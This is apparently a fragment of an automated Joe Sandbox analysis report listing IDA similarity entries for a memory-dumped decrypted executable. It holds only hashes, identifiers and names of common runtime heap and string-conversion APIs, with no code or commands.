                                                                                                                                                                                                          • Instruction ID: 658b845125df41e3d707b834e255611bbe4f6e958313e82604e3ea1cd6ed1d71
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 47ccaf1a7f74cd3e733cb6c5cd31dbbbe8972a233b29932fb87548b6fe9d3e17
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 50016972314A5092E7219B26A5807AAA3B4FB88BC0F548026EB4987774DF3AC8528300
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.2409531576.0000000140001000.00000040.00000001.01000000.00000004.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000004.00000002.2409510757.0000000140000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2409564953.0000000140024000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2409595338.0000000140025000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_140000000_decrypted_executable.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: CriticalFreeHeapSection$EnterLeave
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 1298188129-0
                                                                                                                                                                                                          • Opcode ID: 5595f30b4037b9aa6adac2c161615a39573475ea320742baef4c0fe7d259a659
                                                                                                                                                                                                          • Instruction ID: 5186432533761a1e63310800083548d259c5d54e134ea9fda60ce401f62d664d
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5595f30b4037b9aa6adac2c161615a39573475ea320742baef4c0fe7d259a659
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 76114C76600B4082EB5A9F53E5943E823A0FB9CBC5F4C8416EB091B6A7DF3AC4A5C300
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.2409531576.0000000140001000.00000040.00000001.01000000.00000004.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000004.00000002.2409510757.0000000140000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2409564953.0000000140024000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2409595338.0000000140025000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_140000000_decrypted_executable.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: ByteCharMultiWidemalloc
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 2735977093-0
                                                                                                                                                                                                          • Opcode ID: b82687d318f43acb72b95e327159745dac6b4a7bc8d4a8e935ee1388842a16e4
                                                                                                                                                                                                          • Instruction ID: 40dc39d6401ac23dbbf15f28fc1e93d87451d781889f5abbfcb2521dceb51717
                                                                                                                                                                                                          • Opcode Fuzzy Hash: b82687d318f43acb72b95e327159745dac6b4a7bc8d4a8e935ee1388842a16e4
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3A118F3260878086EB25CF66B41076ABBA5FB8CBE4F544328EF9D57BA5DF39C4118704
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.2409531576.0000000140001000.00000040.00000001.01000000.00000004.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000004.00000002.2409510757.0000000140000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2409564953.0000000140024000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2409595338.0000000140025000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_140000000_decrypted_executable.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: FreeHeap$CriticalSection$EnterLeavememset
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 4254243056-0
                                                                                                                                                                                                          • Opcode ID: 2bfe007ce864aac335da932a328f28b9e5c2ec482aeaf7599142f2e4e3f2ebe6
                                                                                                                                                                                                          • Instruction ID: bd40ed23f28c7418c8be6727045953eb2e8c2f29468db0d1e18b21a18f306043
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2bfe007ce864aac335da932a328f28b9e5c2ec482aeaf7599142f2e4e3f2ebe6
                                                                                                                                                                                                          • Instruction Fuzzy Hash: FD01C8B5600B8492EB06EB63E9903E923A1FBCDBD0F488416AF0D1B776CF39D4518740